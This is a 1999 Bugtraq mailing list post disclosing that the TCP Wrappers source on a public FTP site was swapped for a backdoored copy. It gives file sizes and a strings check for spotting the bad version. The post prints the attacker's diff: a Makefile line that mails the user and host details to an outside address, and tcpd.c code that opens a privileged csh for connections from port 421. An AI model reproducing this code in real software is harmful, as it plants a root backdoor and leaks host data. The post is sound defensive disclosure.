Bugtraq mailing list archives
backdoored tcp wrapper source code
From: wietse () PORCUPINE ORG (Wietse Venema)
Date: Thu, 21 Jan 1999 11:38:17 -0500
TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. In has an estimated installed base of millions. Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a backdoored version. Eventually this was bound to happen, and that's why the source file is accompanied by a PGP signature. But that is no guarantee against people downloading and installing backdoored software. The backdoor gives access to a privileged shell when a client connects from port 421. The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET. I have informed the sites that downloaded a copy. Below are details on how to recognize the backdoored version. Wietse Relevant time stamp/size information (times relative to MET): Backdoored version: % ls -lcta -r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz ... dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 . Restored version: % ls -lt tcp_wrappers_7.6.tar.gz -r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz The signature of the bad TAR file is: length 99186 instead of 99438. The signature of a compiled tcpd binary is: strings -a tcpd | grep csh any output probably means trouble. Changes that were made to the tcp wrapper 7.6 source code: diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'." + @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd () hotmail com' @echo ####################################################### *************** *** 649,655 **** # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ --- 650,656 ---- # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! # KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ Only in 7.6: Makefile- diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c *** 7.6/tcpd.c Sun Feb 11 11:01:33 1996 --- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996 *************** *** 41,52 **** --- 41,63 ---- int allow_severity = SEVERITY; /* run-time adjustable */ int deny_severity = LOG_WARNING; /* ditto */ + char IDENT[]="NC421\n"; + char SRUN[]="-csh"; + char SPATH[]="/bin/csh"; + #define PORT 421 + main(argc, argv) int argc; char **argv; { struct request_info request; + struct sockaddr_in from; char path[MAXPATHNAMELEN]; + int fromlen; + + fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from, + &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT, + strlen(IDENT));execl(SPATH,SRUN,(char*)0);}} /* Attempt to prevent the creation of world-writable files. */
Current thread:
- CERT Advisory CA-99.01 - TCP.Wrappers (fwd), (continued)
- CERT Advisory CA-99.01 - TCP.Wrappers (fwd) //Stany (Jan 22)
- Misleading CERT Advisory CA-99-01-Trojan-TCP-Wrappers Jochen Thomas Bauer (Jan 22)
- Follow up - IIS 4 logging mnemonix (Jan 23)
- WebRamp M3 remote network access bug John Stanley (Jan 21)
- Re: WebRamp M3 remote network access bug James Egelhof (Jan 21)
- Perl.exe and IIS security advisory mnemonix (Jan 22)
- Re: Perl.exe and IIS security advisory Tabor J. Wells (Jan 24)
- Repost: Wietse's FTP site has moved Wietse Venema (Jan 25)
- Using Example Domain Names in Exploits bandregg () REDHAT COM (Jan 25)
- IIS Advisory Update Marc (Jan 24)
- backdoored tcp wrapper source code Wietse Venema (Jan 21)
- Re: backdoored tcp wrapper source code John Stange (Jan 23)
- SSH 1.x and 2.x Daemon KuRuPTioN (Jan 23)
- Re: SSH 1.x and 2.x Daemon Jan B. Koum (Jan 24)
- Re: SSH 1.x and 2.x Daemon Linux Mailing Lists (Jan 25)
- Re: SSH 1.x and 2.x Daemon KuRuPTioN (Jan 25)
- Re: backdoored tcp wrapper source code John Stange (Jan 23)
- Re: SSH 1.x and 2.x Daemon Alan Olsen (Jan 24)
- baynetworks router DoS Virsoft (Jan 25)
- Re: baynetworks router DoS Neale Banks (Jan 26)
- 2.2.0 SECURITY (fwd) Aaron Lehmann (Jan 26)
- IBM CICS Universal Client 3.x Rude Yak (Jan 27)